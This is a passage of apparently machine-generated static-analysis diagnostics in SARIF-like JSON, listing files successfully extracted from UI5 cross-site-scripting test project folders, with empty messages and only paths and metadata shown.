{ - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 285 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 286 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 287 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 288 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - 
"descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 289 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 290 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 291 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 292 - } - } - } ], - "message" : { - "text" : "" - }, - 
"level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 293 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 294 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 295 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 296 
- } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 297 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 298 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 299 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", - "uriBaseId" : 
"%SRCROOT%", - "index" : 300 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 301 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 302 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 303 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html", - 
"uriBaseId" : "%SRCROOT%", - "index" : 304 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 305 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 306 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 307 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", - 
"uriBaseId" : "%SRCROOT%", - "index" : 308 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 309 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 310 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 
312 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 313 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 314 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 316 - } - } - } ], - "message" : { - 
"text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 317 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 318 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 319 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 320 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - 
"descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 321 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 322 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 324 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : 
"js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 325 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 326 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 328 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : 
"js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 329 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 330 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 332 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : 
"js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 333 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 334 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 335 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 336 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : 
"js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 337 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 338 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 339 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 340 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : 
"js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 341 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 342 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 343 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", - "uriBaseId" : "%SRCROOT%", - "index" : 344 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : 
"js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 345 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 346 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - 